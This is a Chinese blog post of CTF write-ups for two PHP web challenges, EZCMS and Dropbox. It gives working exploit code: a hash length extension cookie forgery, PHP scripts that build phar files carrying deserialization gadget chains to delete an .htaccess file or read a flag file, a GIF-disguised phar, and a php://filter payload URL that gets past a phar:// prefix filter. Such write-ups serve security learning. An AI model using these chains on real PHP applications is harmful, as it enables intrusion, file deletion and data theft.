ctf杀题合集

又要开始学ctf了,不知道第几次了,这次会有成绩吗?不知道,但总得迈出步吧。
前阵子推荐龙博士去xman的夏令营,他回来后热情高涨,决定开始ctf征程,我也得尽力吧。大概每天一题,一周五六道吧,虽然已经入了坑好几年,还是得慢慢来。
这两天打了护网杯和bytectf,依然是体验卡,大概记录一下,可惜环境关的很快复现不了。

EZCMS

扫目录有www.zip源码泄露,打开之后大概看一下。

1
2
3
4
5
6
7
8
9
10
11
function is_admin(){
    $secret = "********";
    $username = $_SESSION['username'];
    $password = $_SESSION['password'];
    if ($username == "admin" && $password != "admin"){
        if ($_COOKIE['user'] === md5($secret.$username.$password)){
            return 1;
        }
    }
    return 0;
}

标准的哈希扩展攻击,hashpump跑一下,用admin/123456登录,改cookie,获得上传权限。

试了试上传好像没过滤,传个php成功了,啥套路。不过马上发现传上去的文件都不能直接访问,会500,只能通过view.php查看。默认目录下有个.htaccess文件,这个500其实就是它造成的。
再看看源码,给了源码又没啥注入点,估计是反序列化的套路,找找看发现有个File对象,属性都是public,很像。
观察这个类,发现可控的文件路径传进了mime_content_type中,前两天suctf的wrietup中提到这个函数也可以触发phar反序列化,所以这里形成了漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
public function view_detail(){

    if (preg_match('/^(phar|compress|compose.zlib|zip|rar|file|ftp|zlib|data|glob|ssh|expect)/i', $this->filepath)){
        die("nonono~");
    }
    $mine = mime_content_type($this->filepath);
    $store_path = $this->open($this->filename, $this->filepath);
    $res['mine'] = $mine;
    $res['store_path'] = $store_path;
    return $res;

}

再找找能利用的魔法方法,发现Profile类里面有个__call:

1
2
3
4
function __call($name, $arguments)
{
    $this->admin->open($this->username, $this->password);
}

这里有个open方法,套路就是找其他有open方法的自带类,跑一下:

1
2
3
4
5
6
7
8
<?php
  foreach (get_declared_classes() as $class) {
    foreach (get_class_methods($class) as $method) {
      if ($method == "open")
        echo "$class->$method\n";
    }
  }
?>

有四个分别是SessionHandler、ZipArchive、XMLReader、SQLite3。其中ZipArchive->open()方法的ZipArchive::OVERWRITE选项可以用来删除文件,正好可以用来解决.htaccess,就可以正常访问上传的php文件了。触发的点是File类中的析构函数调用了checker的upload_file方法,而ZipArchive类中没有这个方法,触发了__call函数,调用了open方法,实现删除文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
class File{

    public $filename;
    public $filepath;
    public $checker;

    function __construct($filename, $filepath)
    {
        $this->filepath = $filepath;
        $this->filename = $filename;
    }
}
class Profile{

    public $username;
    public $password;
    public $admin;
}
$a = new File();
$a->checker = new Profile();
$a->checker->username = "/var/www/html/sandbox/84aa202da71a9c0f4214025ba4583481/.htaccess";
$a->checker->password = ZipArchive::OVERWRITE | ZipArchive::CREATE;
$a->checker->admin = new ZipArchive();
$phar = new Phar("1.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($a); 
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
$phar->stopBuffering();
?>

然后是调用phar的方法,这里限制了路径开头不能有phar,还是suctf的writeup提到可以用伪协议绕过。这样payload就是
112.126.102.158:9999/view.php?filename=2fa0baf1c751e2e9645ea67da0792644.phar&filepath=php://filter/read=convert.base64-encode/resource=phar://./sandbox/84aa202da71a9c0f4214025ba4583481/2fa0baf1c751e2e9645ea67da0792644.phar
触发后直接访问上传的php文件就行了,不要再访问upload.php否则会又生成.htaccess

其实后半部分基本是这道题https://corb3nik.github.io/blog/insomnihack-teaser-2018/file-vault

###dropbox
地址:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA%20Day1%20Web1]Dropbox
这题套路差不多,也是phar触发的反序列化,每次比赛都有这样的题。。。这题没啥说的,主要是细心。
随便注册个账号,直接登录进去,有三个功能:上传、下载、删除。肯定要试试任意下载,果然有一个。先试了passwd验证了之后想开始找目录,找了半天发现用../../index.php就行了。
下载源码分析几个主要的文件,分别是class.php、download.php和delete.php。
class.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
<?php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);

class User {
    public $db;


    public function __construct() {
        global $db;
        $this->db = $db;
    }


    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }


    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }


    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }


    public function __destruct() {
        $this->db->close();
    }
}


class FileList {
    private $files;
    private $results;
    private $funcs;


    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);


        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);


        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }


    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }


    public function __destruct() {
        $table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
        $table .= '<thead><tr>';
        foreach ($this->funcs as $func) {
            $table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
        }
        $table .= '<th scope="col" class="text-center">Opt</th>';
        $table .= '</thead><tbody>';
        foreach ($this->results as $filename => $result) {
            $table .= '<tr>';
            foreach ($result as $func => $value) {
                $table .= '<td class="text-center">' . htmlentities($value) . '</td>';
            }
            $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">删除</a></td>';
            $table .= '</tr>';
        }
        echo $table;
    }
}


class File {
    public $filename;


    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }


    public function name() {
        return basename($this->filename);
    }


    public function size() {
        $size = filesize($this->filename);
        $units = array(' B', ' KB', ' MB', ' GB', ' TB');
        for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
        return round($size, 2).$units[$i];
    }


    public function detele() {
        unlink($this->filename);
    }


    public function close() {
        return file_get_contents($this->filename);
    }
}
?>

download.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

if (!isset($_POST['filename'])) {
    die();
}

include "class.php";
ini_set("open_basedir", getcwd() . ":/etc:/tmp");


chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) {
    Header("Content-type: application/octet-stream");
    Header("Content-Disposition: attachment; filename=" . basename($filename));
    echo $file->close();
} else {
    echo "File not exist";
}
?>

delete.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

if (!isset($_POST['filename'])) {
    die();
}

include "class.php";

chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
    $file->detele();
    Header("Content-type: application/json");
    $response = array("success" => true, "error" => "");
    echo json_encode($response);
} else {
    Header("Content-type: application/json");
    $response = array("success" => false, "error" => "File not exist");
    echo json_encode($response);
}
?>

先找找有没有什么敏感函数,File类中open方法有file_exists可以触发phar的反序列化,close方法有file_get_contents可以读内容。所有就根据这两处找找利用链。最开始想到就是User类中的析构函数调用了db属性的close方法,可以把db赋值为一个File类,调用同名函数。
但是这有个问题,读完了文件并没有回显的地方,所以这其实是个坑。再看看发现回显是在FileList中call方法给list赋值,然后destruct中打印。
运行这个生成phar文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
    class User {
        public $db;
    }
    class FileList {
        private $files;
        public function __construct(){
            $this->files=array(new File());
        }
    } 
    class File{
        public $filename = "/flag.txt";
    }
    $o = new User();
    $o->db =new FileList();
    $phar = new Phar("phar.phar");
    $phar->startBuffering();
    $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub
    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
    copy("phar.phar","test.gif")
?>

User->db是FileList类,Userdestruct时会调用db的close方法,因为FileList没有close方法所以触发call函数,call里面的逻辑就是再去调用$file的同名方法,$file是一个File类,所以就调用了File的close方法,读取了文件,存到FileList类的result中,destruct时候打印到页面。
有了pop链然后就是找触发反序列化的点,看上去有三个参数可控点可以触发,分别是download.php中和delete.php中调用的File类的open方法,其中有file_exist函数。另外是delete.php中调用的File的delete方法,里面有unlink函数。
但实际上unlink那里的没办法传参,参数是不可控的,只能通过open方法。而download中的open方法前面被open_basedir限制了路径,没办法利用。所以最后的触发点就是delete.php中的filename参数。上传伪装的phar文件test.gif,然后向delete.php用post发送filename=phar://test.gif就会在返回值中打印出flag

####参考链接
https://altman.vip/2019/09/09/ByteCTF-WEB/
https://blog.zeddyu.info/2019/08/24/SUCTF-2019/
https://skysec.top/2018/03/15/Some%20trick%20in%20ssrf%20and%20unserialize()/
https://www.fuzzer.xyz/2019/04/29/phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%8B%93%E5%B1%95%E6%94%BB%E5%87%BB%E6%B5%85%E6%9E%90/
http://adm1n.design/2019/09/10/Ciscn%20%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA%20Dropbox/
https://xz.aliyun.com/t/2715

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

很惭愧<br><br>只做了一点微小的工作<br>谢谢大家